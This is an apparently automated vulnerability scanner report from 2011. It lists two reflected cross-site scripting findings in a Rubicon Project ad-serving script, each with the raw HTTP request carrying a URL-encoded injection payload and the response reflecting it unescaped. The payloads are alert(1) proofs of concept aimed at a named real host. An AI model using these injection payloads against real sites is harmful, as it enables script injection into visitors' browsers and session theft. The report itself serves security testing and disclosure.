1. Cross-site scripting (reflected)
1.1. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/dorothy.js [REST URL parameter 3]
1.2. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/dorothy.js [REST URL parameter 3]
Severity: | High |
Confidence: | Certain |
Host: | http://tap-cdn.rubic |
Path: | /partner/scripts/rubicon |
GET /partner/scripts/rubiconbe611%252a%252falert Host: tap-cdn.rubiconproject Proxy-Connection: keep-alive Referer: http://www.salon.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 200 OK Server: TRP Apache-Coyote/1.1 Last-Modified: Thu, 27 Jan 2011 02:06:18 GMT p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/javascript;charset Cache-Control: private, max-age=3600 Expires: Thu, 27 Jan 2011 03:06:18 GMT Date: Thu, 27 Jan 2011 02:06:18 GMT Connection: close Vary: Accept-Encoding Content-Length: 5845 /*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */ oz_partner = "rubiconbe611*/alert(1)/ funct ...[SNIP]... ;if(E||D.autorun){D } /* The requested resource (/oz/scripts/partners */ oz_insight(); |
Severity: | High |
Confidence: | Certain |
Host: | http://tap-cdn.rubic |
Path: | /partner/scripts/rubicon |
GET /partner/scripts/rubicon29411%2522%253balert Host: tap-cdn.rubiconproject Proxy-Connection: keep-alive Referer: http://www.salon.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GIP9HWY4-MADS-10.208 |
HTTP/1.1 200 OK Server: TRP Apache-Coyote/1.1 Last-Modified: Thu, 27 Jan 2011 02:06:17 GMT p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/javascript;charset Cache-Control: private, max-age=3600 Expires: Thu, 27 Jan 2011 03:06:17 GMT Date: Thu, 27 Jan 2011 02:06:17 GMT Connection: close Vary: Accept-Encoding Content-Length: 5845 /*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */ oz_partner = "rubicon29411";alert(1)/ function RubiconInsight(){this ...[SNIP]... |